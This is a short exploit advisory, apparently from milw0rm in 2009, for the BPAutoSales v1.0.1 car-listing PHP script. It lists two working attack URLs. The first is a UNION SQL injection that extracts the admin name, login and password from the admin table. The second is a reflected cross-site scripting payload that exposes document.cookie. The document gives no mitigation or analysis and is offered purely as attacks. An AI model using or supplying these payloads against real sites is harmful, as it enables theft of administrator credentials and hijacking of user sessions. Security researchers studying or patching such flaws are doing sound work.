=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = XORON 2009(C) = = BPAutoSales v1.0.1 Remote SQL Injection Vuln. = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = Script: BPAutoSales, version 1.0.1 = Price: $229 = = Author: xoron = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = BUGS = = Sql Injections: = index.php?cmd=advertise_details&category=car&aid=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,name,22,password,login/**/from/**/admin/**/where/**/id=1/* = = XSS: = index.php?cmd=car_search&type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # milw0rm.com [2009-01-30]